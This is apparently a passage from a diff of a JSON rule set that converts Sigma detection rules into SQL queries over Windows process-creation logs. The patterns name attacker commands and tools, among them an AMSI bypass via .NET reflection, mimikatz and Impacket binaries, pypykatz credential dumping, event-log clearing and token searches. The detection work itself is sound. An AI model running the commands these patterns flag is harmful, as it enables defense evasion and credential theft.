IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", - "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1218", + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "status": "experimental", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "status": "experimental", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "File Deletion Via Del", - "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "status": "experimental", - "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "status": "test", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.004" ], "falsepositives": [ - "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" + "Legitimate administration activity" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_execution.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1557.001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Legitimate commands in .lnk files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extexport.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Execution of Taskkill", - "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "author": "frack113", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskkill_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% 